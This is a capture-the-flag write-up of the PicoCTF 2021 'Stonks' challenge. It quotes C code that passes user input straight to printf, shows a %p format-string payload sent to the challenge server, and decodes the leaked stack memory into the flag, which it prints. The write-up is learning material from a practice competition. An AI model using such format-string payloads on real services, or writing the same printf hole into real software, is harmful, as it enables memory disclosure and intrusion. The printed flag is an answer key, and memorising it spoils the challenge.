PicoCTF 2021 Writeups

our team's writeups for the 2021 PicoCTF competition

View on GitHub

Stonks

DISCLAIMER: I got big hints from a friend. There is no way I'd have been able to solve this 😅. I'm also not entirely sure how exactly this challenge worked... I'm not qualified to write a writeup for this challenge 😅.

Overview:

Category: Binary Exploitation Points: 20

Description

I decided to try something noone else has before. I made a bot to automatically trade stonks for me using AI and machine learning. I wouldn't believe you if you told me it's unsecure! vuln.c nc mercury.picoctf.net 53437

Hints

  1. Okay, maybe I'd believe you if you find my API key.

Stuff I Was Told (Since Pico is Over)

Approach

Connect to the shell with nc mercury.picoctf.net 53437

Take a look at

char *user_buf = malloc(300 + 1);
printf("What is your API token?\n");
scanf("%300s", user_buf);
printf("Buying stonks with token:\n");
printf(user_buf);

and notice the printf(user_buff); (I was kinda directed to this so I'm not entirely sure why it's this specifically that's important).

What would you like to do?
1) Buy some stonks!
2) View my portfolio
1
Using patented AI algorithms to buy stonks
Stonks chosen
What is your API token?
%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
Buying stonks with token:
0x8b953900x804b0000x80489c30xf7fa5d800xffffffff0x10x8b931600xf7fb31100xf7fa5dc7(nil)0x8b941800x20x8b953700x8b953900x6f6369700x7b4654430x306c5f490x345f74350x6d5f6c6c0x306d5f790x5f79336e0x346364620x616535320xffbd007d
Portfolio as of Thu Apr  8 01:52:11 UTC 2021


2 shares of H
5 shares of AF
34 shares of O
25 shares of SOF
229 shares of YQWO
Goodbye!

This part:

0x8b953900x804b0000x80489c30xf7fa5d800xffffffff0x10x8b931600xf7fb31100xf7fa5dc7(nil)0x8b941800x20x8b953700x8b953900x6f6369700x7b4654430x306c5f490x345f74350x6d5f6c6c0x306d5f790x5f79336e0x346364620x616535320xffbd007d

looks like hex. I reformatted it in notepad (and also took out everything before (nil) which I guess was padding or something):

8b9418028b953708b953906f6369707b465443306c5f49345f74356d5f6c6c306d5f795f79336e3463646261653532ffbd007d

and jammed it into HxD which gives:

‹”‹•7¹Socip{FTC0l_I4_t5m_ll0m_y_y3n4cdbae52ÿ½�}

it looks like ocip{FTC0l_I4_t5m_ll0m_y_y3n4cdbae52ÿ½�} is the flag except each 4 character block is reversed (little endian? also this is just a guess, I don't actually know)

I wrote a script to output the proper flag.

this outputted picoCTF{I_l05t_4ll_my_m0n3y_bdc425ea}�½ÿ

Flag

picoCTF{I_l05t_4ll_my_m0n3y_bdc425ea}